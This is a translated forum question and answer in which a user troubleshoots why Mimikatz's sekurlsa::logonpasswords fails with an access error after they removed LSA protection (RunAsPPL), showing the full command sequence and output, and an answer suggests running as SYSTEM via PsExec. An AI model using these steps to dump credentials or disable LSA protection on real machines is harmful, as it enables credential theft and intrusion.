什么能阻止Mimikatz访问LSA？

Question

我以前在我的一台电脑里运行Mimikatz。然后，我做了一些事情来阻止它的行动，我不记得它是什么。我正试图恢复它，但没有成功。

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

792     {0;000003e7} 1 D 63431          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;00025b34} 1 F 4156027     COMP\U244        S-1-5-21-542114799-846785721-1465343628-1001    (14g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 4625769     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

我知道RunAsPPL，但我已经删除了它：

reg query “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA” /v RunAsPPL
ERROR: Invalid key name.

也许HotFIX改变了什么，我正在运行：

OS Version:                10.0.19043 N/A Build 19043

还有什么能破坏必要的通道？

Answer 1

我试过Mimikatz最新版本和2.1.1版本，两者似乎都不起作用。显然，您需要通过以管理员身份运行cmd作为NT授权\系统，然后在新生成的cmd中，确保".\PsExec64.exe -i -s cmd.exe“返回NT AUTHORITY\SYSTEM。